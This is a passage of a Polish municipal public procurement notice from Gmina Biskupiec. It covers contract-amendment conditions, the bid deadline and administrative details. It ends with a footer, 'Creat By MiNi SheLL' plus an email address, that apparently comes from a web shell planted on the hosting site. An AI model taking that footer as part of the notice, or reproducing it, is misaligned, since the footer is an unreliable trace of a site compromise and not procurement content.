5.	Przyczyna: wystąpienie katastrofy budowlanej, działania siły wyższej i osób trzecich, od działania których uzależniona jest możliwość kontynuowania prac objętych niniejszą umową, zaistnienia zdarzenia zewnętrznego wobec łączącej strony więzi prawnej o charakterze niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem umowy, którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności, którego nie można przypisać drugiej stronie; Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne,  nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia.
Skutek: zmiana w umowie/aneks -  zmiana uwzględniająca wystąpienie wyżej wymienionych przesłanek oraz uwzględniająca konsekwencje ich wystąpienia w szczególności odnośnie zmiany terminu realizacji.
6.	Przyczyna - Wystąpienie zamówień dodatkowych zgodnie z art. 67 ust.1 pkt. 5 ustawy Prawo zamówień publicznych. 
Skutek - zmiana w umowie/aneks - Zmiana terminu wykonania robót.  

7.	Przyczyna - Znalezienie niewybuchów lub niewypałów.
Skutek - zmiana w umowie/aneks- Zmiana terminu wykonania przedmiotu umowy z  uwzględnieniem wszystkich konsekwencji wystąpienia ww. przesłanki.
 
8.	Przyczyna: Odkrycia, wykopaliska  archeologiczne.
Skutek - zmiana w umowie/aneks - Zmiana terminu wykonania przedmiotu umowy z  uwzględnieniem wszystkich konsekwencji wystąpienia ww. przesłanki.

9.	Przyczyna - Przekształcenie firmy, zmiana nazwy firmy. 
Skutek - zmiana w umowie/aneks - Spisanie aneksu do umowy uwzględniającego dokonanie przekształcenia firmy.

10.	Nie wymaga aneksu do umowy, w szczególności: 
a)	zmiana danych związanych z obsługą administracyjno-organizaycjną Umowy (np. zmiana nr rachunku bankowego),
b)	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami. 
c)	zmiany szacowanej ilości - faktyczne ilości (mniejsze lub większe od prognozy), uzależnione będzie wyłącznie od rzeczywistych potrzeb Zamawiającego, z tym że Wykonawca zobowiązany jest w każdym przypadku stosować zaoferowaną w ofercie cenę jednostkową,
d)	zmiana szacowanej wartości umowy brutto - zmiana jest automatyczna i wynika z pomnożenia podanych w ofercie cen jednostkowych brutto i zleconych ilości, przy zachowaniu przepisów ustawy o finansach publicznych,
e)	zmiana terminu wykonania jednostkowego zlecenia - termin wynosi 7 dni od momentu zgłoszenia. Termin ten może być za zgodą Zamawiającego wydłużony do 14 dni w przypadku niesprzyjających warunków atmosferycznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.biskupiec.pl/ogloszenia_przetargi.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Biskupiec
al. Niepodległości 2, 11-300 Biskupiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2014 godzina 12:00, miejsce: Gmina Biskupiec
al. Niepodległości 2, 11-300 Biskupiec
pokój nr 10 (KANCELARIA), parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com